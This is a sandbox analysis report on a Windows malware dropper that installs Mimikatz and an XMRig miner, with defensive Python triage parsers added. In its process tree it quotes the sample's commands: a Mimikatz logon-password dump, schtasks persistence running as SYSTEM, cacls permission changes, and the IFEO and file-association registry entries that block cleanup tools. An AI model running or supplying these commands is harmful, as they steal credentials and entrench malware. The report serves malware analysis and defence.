Analysis
  max time kernel:   150s
  max time network:  152s
  platform:          windows10-2004_x64
  resource:          win10v2004-20241007-en
  resource tags:     arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  submitted:         26-11-2024 18:23
Behavioral task: behavioral1
  Sample:    2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
  Resource:  win7-20241010-en
Behavioral task: behavioral2
  Sample:    2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
  Resource:  win10v2004-20241007-en
  Every signature match and IoC listed on this page is tagged behavioral2 (the Windows 10 run); the Windows 7 run contributes no IoCs here.
General
  Target:  2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
  Size:    4.3MB
  MD5:     fdcd0858c7855fe5d15be5345aec0c19
  SHA1:    5b260f84a9b4495ecfc255effae8c6365ca42a01
  SHA256:  c292c41a624026c8c157aaf8f197c57e4d62bf259d6933d382ddefd865006303
  SHA512:  f9102ccabc1e4e8446a1805499871a0c68240f5b23ef1df1ac4d9706600e525f55b57f63faea71c0bbae76437db4b487ced7b9ae76bab7d92895a76a1654af0c
  SSDEEP:  98304:rpuFB1/XTsJPZUIbzlMMvylQ6DxVEminfYzUhswFtmOb9G1:6jXKPZUWzlMMhEEminfYzhwH39
Malware Config
  (no entries)
Signatures
  Note on naming: the only families matched by the signatures below are Mimikatz and XMRig. The godropper, hacktools, icedid and luca-stealer tags are part of the submitted filename and are not confirmed by anything on this page. In the process columns below, "the submitted sample" means 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe.

  Mimikatz
    mimikatz is an open source tool to dump credentials on Windows.
  Mimikatz family
  Xmrig family
  Creates a large amount of network flows (1 TTP)
    This may indicate a network scan to discover remotely running services.
  OS Credential Dumping: LSASS Memory (1 TTP)
    Malicious access to credential material held in LSASS memory.
XMRig Miner payload (13 IoCs)
  YARA rule: xmrig
  PID 1424 (taskmgr.exe, a dropped executable, not the Windows Task Manager)
  Region: 0x00007FF60C2A0000-0x00007FF60C35D000
  Matched in behavioral2 memory dumps 90, 91, 95, 96, 97, 98, 99, 112, 114, 115, 116, 117 and 118 (all for the same region).
mimikatz is an open source tool to dump credentials on Windows (2 IoCs)
  YARA rule: mimikatz
  behavioral2/files/0x000c000000023b9c-1.dat                                     (dropped file, matched on disk)
  behavioral2/memory/2112-87, region 0x00007FF782B70000-0x00007FF782C5E000        (PID 2112, vfshost.exe)
Event Triggered Execution: Image File Execution Options Injection (1 TTP, 10 IoCs)
  All ten operations are performed by the submitted sample under \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\. For each target it creates the subkey and sets one string value:
    perfmon.exe\Debugger    = "C:\Windows\system32\svchost.exe"
    wscript.exe\Debugger    = "C:\Windows\system32\svchost.exe"
    sethc.exe\Debugger      = "C:\Windows\system32\svchost.exe"
    magnify.exe\Debugger    = "C:\Windows\system32\svchost.exe"
    powershell.exe\Debugger = "C:\Windows\system32\svchost.exe"
  Effect: when a Debugger value exists under an IFEO subkey, process creation launches the named "debugger" and appends the original command line to it instead of running the target. svchost.exe does not execute a path handed to it as an argument, so these five programs simply fail to start. This is the opposite of the classic sethc.exe/magnify.exe IFEO backdoor (Debugger = cmd.exe to get a shell from the logon screen): here the entries act as a blocker, taking PowerShell, WScript, Performance Monitor and the accessibility tools away from anyone trying to inspect or clean the host. cscript.exe and cmd.exe are not covered.
Executes dropped EXE (8 IoCs)
  PID   Process
  2468  the submitted sample
  5116  wimnat.exe
  1424  taskmgr.exe            (dropped copy; its memory matches the xmrig and upx rules)
  3048  xchlyg.exe
  2112  vfshost.exe            (its memory matches the mimikatz and upx rules)
  4464  the submitted sample
  4876  GoogleCdoeUpdate.exe
  5808  the submitted sample
Creates a Windows Service
  (no IoCs listed)
Drops file in System32 directory (2 IoCs)
  File created                  C:\Windows\SysWOW64\xchlyg.exe   wimnat.exe
  File opened for modification  C:\Windows\SysWOW64\xchlyg.exe   wimnat.exe
UPX packed file (18 IoCs)
  YARA rule: upx
  behavioral2/files/0x0007000000023cd5-67.dat                                   (dropped file)
  behavioral2/files/0x0007000000023cd1-84.dat                                   (dropped file)
  PID 1424 (taskmgr.exe), region 0x00007FF60C2A0000-0x00007FF60C35D000: memory dumps 68, 90, 91, 95, 96, 97, 98, 99, 112, 114, 115, 116, 117, 118
  PID 2112 (vfshost.exe), region 0x00007FF782B70000-0x00007FF782C5E000: memory dumps 85, 87
  The same two regions also match the xmrig (PID 1424) and mimikatz (PID 2112) rules above: both payloads are UPX-packed and were recognised as families only once unpacked in memory.
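The correlation just described (same PID and memory region hit by a packer rule and a family rule) is easy to lose in a flat IoC list. The following is an added example, not part of the report or of any Triage tooling: it parses a handful of the YARA hit lines quoted above together with the PID-to-name map from "Executes dropped EXE", groups hits per process, computes the size of each matched region and states whether a family was unpacked in memory. The hit lines are copied from this page; "dropper.exe" stands in for the long sample filename, which is an assumption for readability.

```python
import re
from collections import defaultdict

# Constructed sample: YARA hit lines copied from the report (a subset of the
# xmrig, mimikatz and upx matches) plus the PID-to-name map from "Executes
# dropped EXE". "dropper.exe" stands in for the sample's long filename.
SAMPLE_HITS = [
    "behavioral2/memory/1424-68-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp upx",
    "behavioral2/files/0x0007000000023cd5-67.dat upx",
    "behavioral2/memory/1424-90-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp xmrig",
    "behavioral2/memory/1424-90-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp upx",
    "behavioral2/memory/2112-85-0x00007FF782B70000-0x00007FF782C5E000-memory.dmp upx",
    "behavioral2/memory/2112-87-0x00007FF782B70000-0x00007FF782C5E000-memory.dmp mimikatz",
    "behavioral2/files/0x000c000000023b9c-1.dat mimikatz",
]
PID_NAMES = {2468: "dropper.exe", 5116: "wimnat.exe", 1424: "taskmgr.exe",
             3048: "xchlyg.exe", 2112: "vfshost.exe", 4876: "GoogleCdoeUpdate.exe"}

MEM_RE = re.compile(
    r"^(\w+)/memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp (\S+)$")
FILE_RE = re.compile(r"^(\w+)/files/(\S+) (\S+)$")
PACKER_RULES = {"upx"}   # rules that describe a packer layer rather than a family


def parse_hit(line):
    """Turn one 'resource rule' line into a dict, or None if it is not a YARA hit."""
    line = line.strip()
    m = MEM_RE.match(line)
    if m:
        task, pid, snap, base, end, rule = m.groups()
        return {"kind": "memory", "task": task, "pid": int(pid), "snapshot": int(snap),
                "base": int(base, 16), "end": int(end, 16), "rule": rule.lower()}
    m = FILE_RE.match(line)
    if m:
        task, name, rule = m.groups()
        return {"kind": "file", "task": task, "name": name, "rule": rule.lower()}
    return None


def correlate(lines, pid_names):
    """Group memory hits by PID and file hits by dropped-file name; return (procs, files)."""
    procs, files = {}, defaultdict(set)
    for hit in filter(None, map(parse_hit, lines)):
        if hit["kind"] == "file":
            files[hit["name"]].add(hit["rule"])
            continue
        p = procs.setdefault(hit["pid"], {
            "process": pid_names.get(hit["pid"], "<unknown>"),
            "regions": set(), "rules": set(), "first_snapshot": hit["snapshot"]})
        p["regions"].add((hit["base"], hit["end"]))
        p["rules"].add(hit["rule"])
        p["first_snapshot"] = min(p["first_snapshot"], hit["snapshot"])
    return procs, dict(files)


def region_sizes(proc):
    """Byte length of each matched region, in ascending base-address order."""
    return [end - base for base, end in sorted(proc["regions"])]


def verdict(proc):
    """A family rule and a packer rule on one process means the family was unpacked in memory."""
    families = sorted(proc["rules"] - PACKER_RULES)
    packers = sorted(proc["rules"] & PACKER_RULES)
    if families and packers:
        return f"{proc['process']}: {'+'.join(families)} unpacked in memory ({'+'.join(packers)} stub)"
    if families:
        return f"{proc['process']}: {'+'.join(families)} in memory"
    return f"{proc['process']}: only packer signature ({'+'.join(packers)}), family unknown"


if __name__ == "__main__":
    procs, files = correlate(SAMPLE_HITS, PID_NAMES)
    for pid, proc in sorted(procs.items()):
        print(pid, verdict(proc), [hex(s) for s in region_sizes(proc)])
    for name, rules in sorted(files.items()):
        print(name, sorted(rules))
```

Feeding it the full hit lists from this page gives one 0xBD000-byte region for taskmgr.exe (xmrig + upx) and one 0xEE000-byte region for vfshost.exe (mimikatz + upx); the dropped-file hits show which of the on-disk artifacts were already recognisable before unpacking.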
Drops file in Windows directory (64 IoCs)
  Unless noted, every operation is "File created" by the submitted sample.

  C:\Windows\
    svschost.xml, spoolsrv.xml, 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
    (each of the three also "opened for modification")
  C:\Windows\ime\
    2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe   (also "opened for modification")
  C:\Windows\InfusedAppe\Corporate\
    mimilib.dll, mimidrv.sys, vfshost.exe, scvhost.exe
    log.txt   (opened for modification by cmd.exe)
  C:\Windows\InfusedAppe\Priess\
    ip.txt (also opened for modification by the sample), scan.bat, GoogleCdoeUpdate.exe
    Result.txt   (opened for modification by GoogleCdoeUpdate.exe)
  C:\Windows\InfusedAppe\LocalService\
    AppCapture_x32.dll, AppCapture_x64.dll, spoolsrv.xml, svschost.xml
  C:\Windows\InfusedAppe\LocalService\specials\
    cnli-1.dll, coli-0.dll, crli-0.dll, exma-1.dll, libeay32.dll, libxml2.dll, posh-0.dll, spoolsrv.exe, spoolsrv.xml, ssleay32.dll, svschost.exe, svschost.xml, tibe-2.dll, trch-1.dll, trfo-2.dll, tucl-1.dll, ucl.dll, xdvl-0.dll, zlib1.dll
  C:\Windows\InfusedAppe\UnattendGC\
    AppCapture_x32.dll, AppCapture_x64.dll, spoolsrv.xml, svschost.xml
  C:\Windows\InfusedAppe\UnattendGC\specials\
    (the same 19 files as LocalService\specials\)

  Reading the drop set:
    The Corporate\ directory holds the credential-theft component: mimilib.dll and mimidrv.sys are Mimikatz's SSP/driver modules, and vfshost.exe (PID 2112) is the process whose memory matched the mimikatz rule.
    scvhost.exe, svschost.exe and spoolsrv.exe are lookalikes of svchost.exe and spoolsv.exe; the sample also copies itself into C:\Windows\ and C:\Windows\ime\.
    The DLL names in the two specials\ directories (cnli-1, coli-0, crli-0, exma-1, posh-0, tibe-2, trch-1, trfo-2, tucl-1, ucl, xdvl-0 plus libxml2, zlib1, libeay32 and ssleay32) match the support libraries of the leaked FuzzBunch toolkit used by EternalBlue and the related SMB exploits. Together with Priess\scan.bat, ip.txt and Result.txt and the "large amount of network flows" signature, this is consistent with a scan-and-exploit spreading component, but the report shows no exploitation traffic and the filenames alone are not proof.
    The .xml files beside each lookalike executable may be scheduled-task definitions (schtasks.exe ran three times), though their content is not shown here.
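A first pass over a drop list like the one above is mechanical: group the created files by directory, mark the ones that are known tool components, and flag executables whose names sit one or two edits away from a Windows system binary. This is an added example, not code from the report or from any sandbox vendor. It parses a subset of the "File created" / "File opened for modification" records quoted above (copied from this page, with "dropper.exe" standing in for the long sample filename, an assumption) and applies those three checks. The FuzzBunch library list and the lookalike threshold are the author's assumptions; a filename match is a lead to pull the file and hash it, not a verdict.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed sample: file events copied from the report's "Drops file" sections.
# "dropper.exe" stands in for the sample's long filename.
SAMPLE_EVENTS = [
    r"File created C:\Windows\InfusedAppe\Corporate\mimilib.dll dropper.exe",
    r"File created C:\Windows\InfusedAppe\Corporate\mimidrv.sys dropper.exe",
    r"File created C:\Windows\InfusedAppe\Corporate\vfshost.exe dropper.exe",
    r"File created C:\Windows\InfusedAppe\Corporate\scvhost.exe dropper.exe",
    r"File created C:\Windows\InfusedAppe\UnattendGC\specials\tucl-1.dll dropper.exe",
    r"File created C:\Windows\InfusedAppe\UnattendGC\specials\spoolsrv.exe dropper.exe",
    r"File created C:\Windows\InfusedAppe\LocalService\specials\svschost.exe dropper.exe",
    r"File created C:\Windows\InfusedAppe\Priess\GoogleCdoeUpdate.exe dropper.exe",
    r"File opened for modification C:\Windows\InfusedAppe\Priess\Result.txt GoogleCdoeUpdate.exe",
    r"File created C:\Windows\SysWOW64\xchlyg.exe wimnat.exe",
]

EVENT_RE = re.compile(r"^File (created|opened for modification) (\S+) (\S+)$")
MIMIKATZ_PARTS = {"mimilib.dll", "mimidrv.sys"}
# Support DLLs shipped with the leaked FuzzBunch (EternalBlue) toolkit.
# Assumed list; a name match is a lead, not proof that SMB exploitation happened.
FUZZBUNCH_LIBS = {"cnli-1.dll", "coli-0.dll", "crli-0.dll", "exma-1.dll", "posh-0.dll",
                  "tibe-2.dll", "trch-1.dll", "trfo-2.dll", "tucl-1.dll", "ucl.dll",
                  "xdvl-0.dll", "libxml2.dll", "zlib1.dll", "libeay32.dll", "ssleay32.dll"}
# System binary names that malware likes to imitate (lower-case for comparison).
LEGIT_NAMES = ["svchost.exe", "spoolsv.exe", "lsass.exe", "csrss.exe", "googleupdate.exe"]
MAX_EDITS = 2   # assumed threshold: this many edits or fewer counts as a lookalike


def levenshtein(a, b):
    """Edit distance (insert/delete/substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(filename):
    """Label a dropped filename: known component, toolkit library, lookalike, or unclassified."""
    low = filename.lower()
    if low in MIMIKATZ_PARTS:
        return "mimikatz component"
    if low in FUZZBUNCH_LIBS:
        return "FuzzBunch support library (filename match)"
    for legit in LEGIT_NAMES:
        if low != legit and levenshtein(low, legit) <= MAX_EDITS:
            return f"lookalike of {legit}"
    return "unclassified"


def parse_file_event(line):
    """Return (action, path, process) for one record, or None if it does not parse."""
    m = EVENT_RE.match(line.strip())
    return m.groups() if m else None


def inventory(lines):
    """Map each directory to the sorted list of files created in it."""
    tree = defaultdict(list)
    for action, path, _process in filter(None, map(parse_file_event, lines)):
        if action != "created":
            continue                      # modifications of existing files are not drops
        p = PureWindowsPath(path)
        tree[str(p.parent)].append(p.name)
    return {d: sorted(names) for d, names in tree.items()}


def flagged(lines):
    """Full path -> label for every created file that classify() does not leave unclassified."""
    out = {}
    for directory, names in inventory(lines).items():
        for name in names:
            label = classify(name)
            if label != "unclassified":
                out[str(PureWindowsPath(directory) / name)] = label
    return out


if __name__ == "__main__":
    for path, label in sorted(flagged(SAMPLE_EVENTS).items()):
        print(f"{label:45} {path}")
```

Note what the name heuristic misses: GoogleCdoeUpdate.exe is four edits from GoogleUpdate.exe and vfshost.exe is three from svchost.exe, so neither is flagged at a threshold of two. Raising the threshold quickly starts matching legitimate names, which is why a name check is only a triage aid; the report's own evidence for vfshost.exe is the mimikatz YARA match on its memory, not its name.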
Launches sc.exe (1 IoC)
  sc.exe is the Windows utility for controlling services on the system.
  PID 548   sc.exe
System Location Discovery: System Language Discovery (1 TTP, 29 IoCs)
  Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
    cmd.exe                12
    the submitted sample    4
    schtasks.exe            3
    net.exe                 3
    net1.exe                3
    sc.exe                  1
    GoogleCdoeUpdate.exe    1
    xchlyg.exe              1
    wimnat.exe              1
  Caveat: this key is read during ordinary locale initialisation, which is why built-in tools such as cmd.exe, net.exe and schtasks.exe account for most of the hits. On its own it is not evidence that the sample checks its geographic location.
Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0         xchlyg.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz    xchlyg.exe
Modifies data under HKEY_USERS (10 IoCs)
  By the submitted sample, under \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\:
    Key created    ZoneMap\
    Set value (int) ProxyBypass   = 1
    Set value (int) IntranetName  = 1
    Set value (int) UNCAsIntranet = 1
    Set value (int) AutoDetect    = 0
  By xchlyg.exe, under \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum:
    Key created    \REGISTRY\USER\.DEFAULT\Software
    Key created    \REGISTRY\USER\.DEFAULT\Software\Microsoft
    Key created    \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie
    Key created    \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum
    Set value (int) Version = 7
  Caveat: the four ZoneMap values are the ones WinINet/urlmon typically writes when a process first initialises Internet security zones, and the .DEFAULT hive means the writer was running as SYSTEM. They indicate network-API use from a SYSTEM context rather than a deliberate proxy change. ActiveMovie\devenum is DirectShow's device-enumerator cache, so xchlyg.exe enumerated media devices in addition to reading the CPU speed above.
Modifies registry class (6 IoCs)
  By the submitted sample. The default value (the ProgID) of each extension key under \REGISTRY\MACHINE\SOFTWARE\Classes\ is set to "txtfile"; the normal Windows defaults are shown for comparison:
    .reg   = "txtfile"   (default: regfile)
    .bat   = "txtfile"   (default: batfile)
    .cmd   = "txtfile"   (default: cmdfile)
    .js    = "txtfile"   (default: JSFile)
    .vbs   = "txtfile"   (default: VBSFile)
    .VBE   = "txtfile"   (default: VBEFile)
  Effect: ShellExecute now resolves these extensions to the txtfile ProgID, so double-clicking or shell-launching a .bat, .cmd, .js, .vbs, .vbe or .reg file opens it in Notepad instead of running it (or, for .reg, importing it). Together with the IFEO entries that block wscript.exe and powershell.exe, this leaves the host without its usual script launch paths and hinders scripted cleanup, administrative tooling and competing malware alike. Running a batch file explicitly (cmd.exe /c script.bat) still works, because cmd.exe does not consult the association.
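The two registry tricks on this page, the IFEO Debugger entries above and the extension remaps just listed, share one record format in the report, so one parser can feed both checks. The following is an added example, not code from the report or from any sandbox product: it parses "Set value" records (copied from this page; "dropper.exe" stands in for the long sample filename, an assumption), flags any IFEO subkey with a Debugger value and shows the command line the loader would actually start, and flags script extensions whose default ProgID differs from the Windows default. The table of default ProgIDs is the standard one; treat any other extension you add to it as your own assumption.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: registry records copied from the report. "dropper.exe"
# stands in for the sample's long filename. The "Key created" line is included
# to show that only "Set value" records are parsed.
SAMPLE_RECORDS = [
    r'Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe dropper.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" dropper.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" dropper.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" dropper.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" dropper.exe',
    r'Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum\Version = "7" xchlyg.exe',
]

# "Set value (<type>) <key>\<value> = "<data>" <process>"; the value name is empty
# for a key's default value (the report writes a trailing backslash in that case).
RECORD_RE = re.compile(r'^Set value \((\w+)\) (.+?)\\([^\\]*) = "(.*)" (\S+)$')
IFEO_RE = re.compile(r'\\Image File Execution Options\\([^\\]+)$', re.IGNORECASE)
CLASSES_RE = re.compile(r'\\SOFTWARE\\Classes\\(\.[^\\]+)$', re.IGNORECASE)

# Default ProgIDs Windows associates with these script extensions.
EXPECTED_PROGID = {".bat": "batfile", ".cmd": "cmdfile", ".js": "JSFile",
                   ".vbs": "VBSFile", ".vbe": "VBEFile", ".reg": "regfile"}


@dataclass(frozen=True)
class RegRecord:
    kind: str      # str / int / ...
    key: str       # full key path
    value: str     # value name, "" for the default value
    data: str      # value data with the report's doubled backslashes collapsed
    process: str   # process that performed the write


def parse_record(line: str) -> Optional[RegRecord]:
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    kind, key, value, data, process = m.groups()
    return RegRecord(kind, key, value, data.replace("\\\\", "\\"), process)


def find_ifeo_hijacks(records):
    """(target, debugger, effective command line) for every IFEO Debugger value."""
    hits = []
    for r in records:
        m = IFEO_RE.search(r.key)
        if m and r.value.lower() == "debugger":
            target = m.group(1)
            # With a Debugger value present the loader starts the "debugger" and
            # appends the original command line; this is what actually runs.
            hits.append((target, r.data, f"{r.data} {target}"))
    return hits


def find_extension_remaps(records):
    """(extension, expected ProgID, actual ProgID) where a script extension was re-pointed."""
    hits = []
    for r in records:
        m = CLASSES_RE.search(r.key)
        if not m or r.value != "":
            continue                      # only the key's default value is the ProgID
        ext = m.group(1).lower()
        expected = EXPECTED_PROGID.get(ext)
        if expected and r.data.lower() != expected.lower():
            hits.append((ext, expected, r.data))
    return hits


def triage(lines):
    records = [r for r in map(parse_record, lines) if r]
    return {"parsed": len(records),
            "ifeo": find_ifeo_hijacks(records),
            "remaps": find_extension_remaps(records)}


if __name__ == "__main__":
    result = triage(SAMPLE_RECORDS)
    for target, debugger, effective in result["ifeo"]:
        print(f"IFEO: launching {target} really runs: {effective}")
    for ext, expected, actual in result["remaps"]:
        print(f"Classes: {ext} -> {actual} (expected {expected})")
```

The same two checks translate directly to a live-host query: enumerate the Image File Execution Options subkeys for a Debugger value and compare the default value of each script-extension key under HKLM\SOFTWARE\Classes with the table above; any Debugger pointing at a non-debugger binary, and any script extension pointing at txtfile, is worth a look regardless of which sample put it there.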
Runs net.exe
  (no IoCs listed; net.exe and net1.exe appear three times each under System Language Discovery above)
Scheduled Task/Job: Scheduled Task (1 TTP, 3 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  PID 3356   schtasks.exe
  PID 636    schtasks.exe
  PID 2384   schtasks.exe
  (the task command lines are not shown in this report)
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  PID   Process               Entries
  2468  the submitted sample  48
  3048  xchlyg.exe            10
  2112  vfshost.exe            6
  (the original list interleaves these 64 entries in the order they occurred)
Suspicious use of AdjustPrivilegeToken (64 IoCs; the list is cut off in the source)
  Token: SeLockMemoryPrivilege   PID 1424   taskmgr.exe            (XMRig enables this privilege to back its working set with large pages)
  Token: SeDebugPrivilege        PID 2112   vfshost.exe            (required to open lsass.exe; consistent with the mimikatz match on this process)
  Token: SeDebugPrivilege        PID 2468   the submitted sample   (every remaining entry in the list is this same token/PID pair, repeated)
SeDebugPrivilege 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process
1200 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
5116 wimnat.exe
3048 xchlyg.exe
4464 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
5808 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
(duplicate rows collapsed)
Suspicious use of WriteProcessMemory 64 IoCs
parent pid  parent Process  ->  target pid  (procid_target)
2468  2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe  ->  4284  (97)
2468  2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe  ->  4524  (98)
2468  2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe  ->  2084  (99)
2468  2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe  ->  760   (101)
2468  2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe  ->  1020  (102)
2468  2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe  ->  688   (103)
2468  2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe  ->  5100  (104)
2468  2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe  ->  1240  (106)
2468  2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe  ->  1424  (107)
2468  2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe  ->  5116  (109)
760   cmd.exe  ->  1956  (117)
760   cmd.exe  ->  3356  (118)
1020  cmd.exe  ->  3500  (119)
688   cmd.exe  ->  5032  (120)
3500  net.exe  ->  3004  (121)
5032  net.exe  ->  1460  (122)
4524  cmd.exe  ->  4240  (123)
4524  cmd.exe  ->  636   (124)
5100  cmd.exe  ->  2596  (125)
4284  cmd.exe  ->  2112  (126)
2084  cmd.exe  ->  4332  (127)
2084  cmd.exe  ->  2384  (128)
(each write is logged several times in the original; duplicate rows collapsed)
Processes
Process tree (child processes are indented under their parent; the signatures hit by each process are listed beneath it):

- C:\Users\Admin\AppData\Local\Temp\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe (PID 1200)
  Command line: "C:\Users\Admin\AppData\Local\Temp\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe"
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx

- C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe (PID 2468)
  Command line: C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
  - Event Triggered Execution: Image File Execution Options Injection
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  - C:\Windows\SysWOW64\cmd.exe (PID 4284)
    Command line: cmd /c C:\Windows\InfusedAppe\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\InfusedAppe\Corporate\log.txt
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    - C:\Windows\InfusedAppe\Corporate\vfshost.exe (PID 2112)
      Command line: C:\Windows\InfusedAppe\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  - C:\Windows\SysWOW64\cmd.exe (PID 4524)
    Command line: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "MiscfostNsi" /ru system /tr "cmd /c C:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe"
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    - C:\Windows\SysWOW64\cmd.exe (PID 4240)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      - System Location Discovery: System Language Discovery

    - C:\Windows\SysWOW64\schtasks.exe (PID 636)
      Command line: schtasks /create /sc minute /mo 1 /tn "MiscfostNsi" /ru system /tr "cmd /c C:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe"
      - System Location Discovery: System Language Discovery
      - Scheduled Task/Job: Scheduled Task

  - C:\Windows\SysWOW64\cmd.exe (PID 2084)
    Command line: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "HomeGroupProvider" /ru system /tr "cmd /c echo Y|cacls C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe /p everyone:F"
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    - C:\Windows\SysWOW64\cmd.exe (PID 4332)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      - System Location Discovery: System Language Discovery

    - C:\Windows\SysWOW64\schtasks.exe (PID 2384)
      Command line: schtasks /create /sc minute /mo 1 /tn "HomeGroupProvider" /ru system /tr "cmd /c echo Y|cacls C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe /p everyone:F"
      - System Location Discovery: System Language Discovery
      - Scheduled Task/Job: Scheduled Task

  - C:\Windows\SysWOW64\cmd.exe (PID 760)
    Command line: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "WwANsvc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F"
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    - C:\Windows\SysWOW64\cmd.exe (PID 1956)
